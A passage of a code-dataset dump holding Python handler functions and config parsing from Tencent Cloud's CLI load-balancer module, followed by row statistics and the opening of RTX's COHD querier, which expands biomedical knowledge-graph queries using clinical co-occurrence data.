    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeregisterTargets(args, parsed_globals):
    """Call the CLB DeregisterTargets API and print its JSON response.

    args: dict of request parameters, serialized into a DeregisterTargetsRequest.
    parsed_globals: parsed global CLI options (credentials, region, endpoint, output/filter).
    """
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        # default to a 60s request timeout when none was supplied on the CLI
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.ClbClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeregisterTargetsRequest()
    model.from_json_string(json.dumps(args))
    rsp = client.DeregisterTargets(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        # json.loads cannot take bytes on Python 3.3; decode explicitly first.
        json_obj = json.loads(result.decode('utf-8'))  # python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyLoadBalancerAttributes(args, parsed_globals):
    """Invoke the CLB ModifyLoadBalancerAttributes API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].ModifyLoadBalancerAttributesRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.ModifyLoadBalancerAttributes(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateClsLogSet(args, parsed_globals):
    """Invoke the CLB CreateClsLogSet API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].CreateClsLogSetRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.CreateClsLogSet(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClassicalLBByInstanceId(args, parsed_globals):
    """Invoke the CLB DescribeClassicalLBByInstanceId API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].DescribeClassicalLBByInstanceIdRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.DescribeClassicalLBByInstanceId(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doReplaceCertForLoadBalancers(args, parsed_globals):
    """Invoke the CLB ReplaceCertForLoadBalancers API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].ReplaceCertForLoadBalancersRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.ReplaceCertForLoadBalancers(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetGroupInstancesPort(args, parsed_globals):
    """Invoke the CLB ModifyTargetGroupInstancesPort API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].ModifyTargetGroupInstancesPortRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.ModifyTargetGroupInstancesPort(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doBatchModifyTargetWeight(args, parsed_globals):
    """Invoke the CLB BatchModifyTargetWeight API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].BatchModifyTargetWeightRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.BatchModifyTargetWeight(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeQuota(args, parsed_globals):
    """Invoke the CLB DescribeQuota API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].DescribeQuotaRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.DescribeQuota(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTargetHealth(args, parsed_globals):
    """Invoke the CLB DescribeTargetHealth API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].DescribeTargetHealthRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.DescribeTargetHealth(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doManualRewrite(args, parsed_globals):
    """Invoke the CLB ManualRewrite API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].ManualRewriteRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.ManualRewrite(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTargetGroupInstancesWeight(args, parsed_globals):
    """Invoke the CLB ModifyTargetGroupInstancesWeight API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].ModifyTargetGroupInstancesWeightRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.ModifyTargetGroupInstancesWeight(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateLoadBalancerSnatIps(args, parsed_globals):
    """Invoke the CLB CreateLoadBalancerSnatIps API with *args* and print the formatted response."""
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(timeout) if timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    version = g_param[OptionsDefine.Version]
    client = CLIENT_MAP[version].ClbClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[version].CreateLoadBalancerSnatIpsRequest()
    request.from_json_string(json.dumps(args))
    raw_result = client.CreateLoadBalancerSnatIps(request).to_json_string()
    try:
        json_obj = json.loads(raw_result)
    except TypeError:
        json_obj = json.loads(raw_result.decode('utf-8'))  # bytes payload on python3.3
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
# Maps supported API version strings to the generated SDK client modules.
CLIENT_MAP = {
    "v20180317": clb_client_v20180317,
}
# Maps supported API version strings to the generated SDK model modules.
MODELS_MAP = {
    "v20180317": models_v20180317,
}
# Maps CLI action names to their handler functions; exposed via action_caller().
ACTION_MAP = {
    "RegisterTargets": doRegisterTargets,
    "SetLoadBalancerSecurityGroups": doSetLoadBalancerSecurityGroups,
    "DescribeClassicalLBListeners": doDescribeClassicalLBListeners,
    "DescribeCustomizedConfigAssociateList": doDescribeCustomizedConfigAssociateList,
    "DescribeBlockIPTask": doDescribeBlockIPTask,
    "CreateListener": doCreateListener,
    "DeleteLoadBalancerSnatIps": doDeleteLoadBalancerSnatIps,
    "DeleteListener": doDeleteListener,
    "SetSecurityGroupForLoadbalancers": doSetSecurityGroupForLoadbalancers,
    "BatchDeregisterTargets": doBatchDeregisterTargets,
    "RegisterTargetGroupInstances": doRegisterTargetGroupInstances,
    "CreateRule": doCreateRule,
    "AutoRewrite": doAutoRewrite,
    "DescribeLoadBalancerTraffic": doDescribeLoadBalancerTraffic,
    "ModifyDomain": doModifyDomain,
    "DeleteLoadBalancerListeners": doDeleteLoadBalancerListeners,
    "DeleteTargetGroups": doDeleteTargetGroups,
    "DeregisterTargetsFromClassicalLB": doDeregisterTargetsFromClassicalLB,
    "CreateLoadBalancer": doCreateLoadBalancer,
    "DescribeLoadBalancerListByCertId": doDescribeLoadBalancerListByCertId,
    "ModifyListener": doModifyListener,
    "DeleteLoadBalancer": doDeleteLoadBalancer,
    "ModifyDomainAttributes": doModifyDomainAttributes,
    "DisassociateTargetGroups": doDisassociateTargetGroups,
    "DeleteRewrite": doDeleteRewrite,
    "DescribeTargetGroupInstances": doDescribeTargetGroupInstances,
    "AssociateTargetGroups": doAssociateTargetGroups,
    "DescribeLoadBalancersDetail": doDescribeLoadBalancersDetail,
    "DeregisterTargetGroupInstances": doDeregisterTargetGroupInstances,
    "DescribeLoadBalancers": doDescribeLoadBalancers,
    "DescribeBlockIPList": doDescribeBlockIPList,
    "DescribeListeners": doDescribeListeners,
    "DescribeClassicalLBTargets": doDescribeClassicalLBTargets,
    "CreateTopic": doCreateTopic,
    "BatchRegisterTargets": doBatchRegisterTargets,
    "DescribeClsLogSet": doDescribeClsLogSet,
    "DescribeCustomizedConfigList": doDescribeCustomizedConfigList,
    "ModifyTargetWeight": doModifyTargetWeight,
    "DescribeTaskStatus": doDescribeTaskStatus,
    "DescribeTargetGroups": doDescribeTargetGroups,
    "ModifyRule": doModifyRule,
    "DeleteRule": doDeleteRule,
    "SetLoadBalancerClsLog": doSetLoadBalancerClsLog,
    "DescribeTargetGroupList": doDescribeTargetGroupList,
    "ModifyBlockIPList": doModifyBlockIPList,
    "CreateTargetGroup": doCreateTargetGroup,
    "DescribeTargets": doDescribeTargets,
    "DescribeRewrite": doDescribeRewrite,
    "RegisterTargetsWithClassicalLB": doRegisterTargetsWithClassicalLB,
    "ModifyTargetPort": doModifyTargetPort,
    "ModifyTargetGroupAttribute": doModifyTargetGroupAttribute,
    "DescribeClassicalLBHealthStatus": doDescribeClassicalLBHealthStatus,
    "DeregisterTargets": doDeregisterTargets,
    "ModifyLoadBalancerAttributes": doModifyLoadBalancerAttributes,
    "CreateClsLogSet": doCreateClsLogSet,
    "DescribeClassicalLBByInstanceId": doDescribeClassicalLBByInstanceId,
    "ReplaceCertForLoadBalancers": doReplaceCertForLoadBalancers,
    "ModifyTargetGroupInstancesPort": doModifyTargetGroupInstancesPort,
    "BatchModifyTargetWeight": doBatchModifyTargetWeight,
    "DescribeQuota": doDescribeQuota,
    "DescribeTargetHealth": doDescribeTargetHealth,
    "ManualRewrite": doManualRewrite,
    "ModifyTargetGroupInstancesWeight": doModifyTargetGroupInstancesWeight,
    "CreateLoadBalancerSnatIps": doCreateLoadBalancerSnatIps,
}
# API versions this module supports; validated in parse_global_arg().
AVAILABLE_VERSION_LIST = [
    "v20180317",
]
def action_caller():
    """Return the mapping from CLI action names to their handler functions."""
    return ACTION_MAP
def parse_global_arg(parsed_globals):
    """Resolve all global CLI parameters (credentials, region, output, version, endpoint).

    Missing values are filled in, in priority order, from the selected profile's
    ~/.tccli/<profile>.configure and <profile>.credential files and — only when no
    explicit profile was given — from environment variables.

    :param parsed_globals: dict of globals parsed from the command line; mutated in place.
    :return: the same dict, fully populated.
    :raises ConfigurationError: if config files are malformed or required values are missing.
    """
    g_param = parsed_globals
    is_exist_profile = True
    if not parsed_globals["profile"]:
        is_exist_profile = False
        g_param["profile"] = "default"
    configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
    is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
    is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
    conf = {}
    cred = {}
    if is_conf_exist:
        conf = Utils.load_json_msg(conf_path)
    if is_cred_exist:
        cred = Utils.load_json_msg(cred_path)
    if not (isinstance(conf, dict) and isinstance(cred, dict)):
        raise ConfigurationError(
            "file: %s or %s is not json format"
            % (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
    if OptionsDefine.Token not in cred:
        cred[OptionsDefine.Token] = None
    # Environment variables only override file values when no profile was
    # explicitly requested on the command line.
    if not is_exist_profile:
        if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
            cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
            cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
            cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
        if os.environ.get(OptionsDefine.ENV_REGION):
            conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
    # Fill any globals still unset from the credential/config dicts; a value
    # that is required but available nowhere is a configuration error.
    for param in g_param.keys():
        if g_param[param] is None:
            if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
                if param in cred:
                    g_param[param] = cred[param]
                else:
                    raise ConfigurationError("%s is invalid" % param)
            elif param in [OptionsDefine.Region, OptionsDefine.Output]:
                if param in conf:
                    g_param[param] = conf[param]
                else:
                    raise ConfigurationError("%s is invalid" % param)
    # Normalize the service version ("2018-03-17" -> "v20180317") and pick up
    # the endpoint from the per-service config section when not given.
    try:
        if g_param[OptionsDefine.ServiceVersion]:
            g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
        else:
            version = conf["clb"][OptionsDefine.Version]
            g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
        if g_param[OptionsDefine.Endpoint] is None:
            g_param[OptionsDefine.Endpoint] = conf["clb"][OptionsDefine.Endpoint]
    except Exception as err:
        raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
    if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
        raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
    return g_param
| 44.116904
| 105
| 0.731743
| 9,389
| 83,778
| 6.28821
| 0.03355
| 0.079878
| 0.228811
| 0.05769
| 0.842886
| 0.839888
| 0.838669
| 0.837449
| 0.835857
| 0.788025
| 0
| 0.008328
| 0.161522
| 83,778
| 1,898
| 106
| 44.140148
| 0.832147
| 0.00789
| 0
| 0.728248
| 0
| 0
| 0.04248
| 0.010512
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039333
| false
| 0
| 0.007151
| 0.000596
| 0.047676
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ce961bc34b1b7a0caaf7eeb8420e83fd7814f16
| 55,838
|
py
|
Python
|
code/ARAX/ARAXQuery/Expand/COHD_querier.py
|
rtx-travis-tester/RTX
|
4936eb0d368e3b40d9cdc988cc546a1eb73d0104
|
[
"MIT"
] | null | null | null |
code/ARAX/ARAXQuery/Expand/COHD_querier.py
|
rtx-travis-tester/RTX
|
4936eb0d368e3b40d9cdc988cc546a1eb73d0104
|
[
"MIT"
] | null | null | null |
code/ARAX/ARAXQuery/Expand/COHD_querier.py
|
rtx-travis-tester/RTX
|
4936eb0d368e3b40d9cdc988cc546a1eb73d0104
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
import sys
import os
import traceback
import ast
import itertools
import numpy as np
from typing import List, Dict, Tuple
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import expand_utilities as eu
from expand_utilities import QGOrganizedKnowledgeGraph
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../") # ARAXQuery directory
from ARAX_response import ARAXResponse
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../") # code directory
from RTXConfiguration import RTXConfiguration
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../UI/OpenAPI/python-flask-server/")
from openapi_server.models.node import Node
from openapi_server.models.edge import Edge
from openapi_server.models.attribute import Attribute
from openapi_server.models.query_graph import QueryGraph
from openapi_server.models.q_node import QNode
from openapi_server.models.q_edge import QEdge
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../ARAX/KnowledgeSources/COHD_local/scripts/")
from COHDIndex import COHDIndex
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../../../ARAX/NodeSynonymizer/")
from node_synonymizer import NodeSynonymizer
class COHDQuerier:
    def __init__(self, response_object: ARAXResponse):
        """Store the ARAX response object and open COHD index / node synonymizer handles.

        :param response_object: ARAXResponse used for logging and for reading query parameters.
        """
        self.response = response_object
        self.cohdindex = COHDIndex()
        self.synonymizer = NodeSynonymizer()
def answer_one_hop_query(self, query_graph: QueryGraph) -> QGOrganizedKnowledgeGraph:
"""
This function answers a one-hop (single-edge) query using COHD database.
:param query_graph: A TRAPI query graph.
:return: An (almost) TRAPI knowledge graph containing all of the nodes and edges returned as
results for the query. (Organized by QG IDs.)
"""
# Set up the required parameters
log = self.response
self.count = 0
COHD_method = self.response.data['parameters']['COHD_method']
COHD_method_percentile = self.response.data['parameters']['COHD_method_percentile']
final_kg = QGOrganizedKnowledgeGraph()
# Switch QG back to old style where category/predicate can be strings OR lists
query_graph = eu.switch_back_to_str_or_list_types(query_graph)
if COHD_method_percentile == 99:
pass
elif type(COHD_method_percentile) is str:
try:
COHD_method_percentile = float(COHD_method_percentile)
if (COHD_method_percentile < 0) or (COHD_method_percentile > 100):
log.error("The 'COHD_method_percentile' in Expander should be between 0 and 100", error_code="ParameterError")
return final_kg
except ValueError:
log.error("The 'COHD_method_percentile' in Expander should be numeric", error_code="ParameterError")
return final_kg
else:
log.error("The 'COHD_method_percentile' in Expander should be an float", error_code="ParameterError")
return final_kg
# Verify this is a valid one-hop query graph
if len(query_graph.edges) != 1:
log.error(f"COHDQuerier.answer_one_hop_query() was passed a query graph that is not one-hop: {query_graph.to_dict()}", error_code="InvalidQuery")
return final_kg
# Run the actual query and process results
if COHD_method.lower() == 'paired_concept_freq':
final_kg = self._answer_query_using_COHD_paired_concept_freq(query_graph, COHD_method_percentile, log)
elif COHD_method.lower() == 'observed_expected_ratio':
final_kg = self._answer_query_using_COHD_observed_expected_ratio(query_graph, COHD_method_percentile, log)
elif COHD_method.lower() == 'chi_square':
final_kg = self._answer_query_using_COHD_chi_square(query_graph, COHD_method_percentile, log)
else:
log.error(f"The parameter 'COHD_method' was passed an invalid option. The current allowed options are `paired_concept_freq`, `observed_expected_ratio`, `chi_square`.", error_code="InvalidParameterOption")
return final_kg
def _answer_query_using_COHD_paired_concept_freq(self, query_graph: QueryGraph, COHD_method_percentile: float, log: ARAXResponse) -> Tuple[QGOrganizedKnowledgeGraph, Dict[str, Dict[str, str]]]:
qedge_key = next(qedge_key for qedge_key in query_graph.edges)
log.debug(f"Processing query results for edge {qedge_key} by using paired concept frequency")
final_kg = QGOrganizedKnowledgeGraph()
# if COHD_method_threshold == float("inf"):
# threshold = pow(10, -3.365) # default threshold based on the distribution of 0.99 quantile
# else:
# threshold = COHD_method_threshold
# log.info(f"The threshod used to filter paired concept frequency is {threshold}")
# extract information from the QueryGraph
qedge = query_graph.edges[qedge_key]
source_qnode_key = qedge.subject
target_qnode_key = qedge.object
source_qnode = query_graph.nodes[source_qnode_key]
target_qnode = query_graph.nodes[target_qnode_key]
# check if both ends of edge have no curie
if (source_qnode.id is None) and (target_qnode.id is None):
log.error(f"Both ends of edge {qedge_key} are None", error_code="BadEdge")
return final_kg
# Convert curie ids to OMOP ids
if source_qnode.id is not None:
source_qnode_omop_ids = self._get_omop_id_from_curies(source_qnode_key, query_graph, log)
else:
source_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
if target_qnode.id is not None:
target_qnode_omop_ids = self._get_omop_id_from_curies(target_qnode_key, query_graph, log)
else:
target_qnode_omop_ids = None
if log.status != 'OK':
return final_kg
# expand edges according to the OMOP id pairs
if (source_qnode_omop_ids is None) and (target_qnode_omop_ids is None):
return final_kg
elif (source_qnode_omop_ids is not None) and (target_qnode_omop_ids is not None):
source_dict = dict()
target_dict = dict()
average_threshold = 0
count = 0
for (source_preferred_key, target_preferred_key) in itertools.product(list(source_qnode_omop_ids.keys()), list(target_qnode_omop_ids.keys())):
if source_qnode.category is None and target_qnode.category is None:
pass
else:
if self.synonymizer.get_canonical_curies(source_preferred_key)[source_preferred_key]['preferred_category'] == source_qnode.category:
pass
else:
continue
if self.synonymizer.get_canonical_curies(target_preferred_key)[target_preferred_key]['preferred_category'] == target_qnode.category:
pass
else:
continue
if len(source_qnode_omop_ids[source_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for source preferred id '{source_preferred_key}'' with qnode id '{qedge.subject}'")
continue
else:
pass
if len(target_qnode_omop_ids[target_preferred_key]) == 0:
log.warning(f"No OMOP concept id was found for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
elif len(self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3)) == 0:
log.warning(f"No paired concept ids was found from COHD database for target preferred id '{target_preferred_key}'' with qnode id '{qedge.object}'")
continue
else:
pass
frequency = 0
threshold1 = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=source_qnode_omop_ids[source_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. 0
threshold2 = np.percentile([row['concept_frequency'] for row in self.cohdindex.get_paired_concept_freq(concept_id_1=target_qnode_omop_ids[target_preferred_key], dataset_id=3) if row['concept_frequency'] != 0], COHD_method_percentile) # calculate the percentile after removing the extreme value e.g. 0
threshold = min(threshold1, threshold2) # pick the minimum one for threshold
average_threshold = average_threshold + threshold
count = count + 1
omop_pairs = [f"{omop1}_{omop2}" for (omop1, omop2) in itertools.product(source_qnode_omop_ids[source_preferred_key], target_qnode_omop_ids[target_preferred_key])]
if len(omop_pairs) != 0:
res = self.cohdindex.get_paired_concept_freq(concept_id_pair=omop_pairs, dataset_id=3) # use the hierarchical dataset
if len(res) != 0:
maximum_concept_frequency = res[0]['concept_frequency'] # the result returned from get_paired_concept_freq was sorted by decreasing order
frequency = maximum_concept_frequency
value = frequency
if value >= threshold:
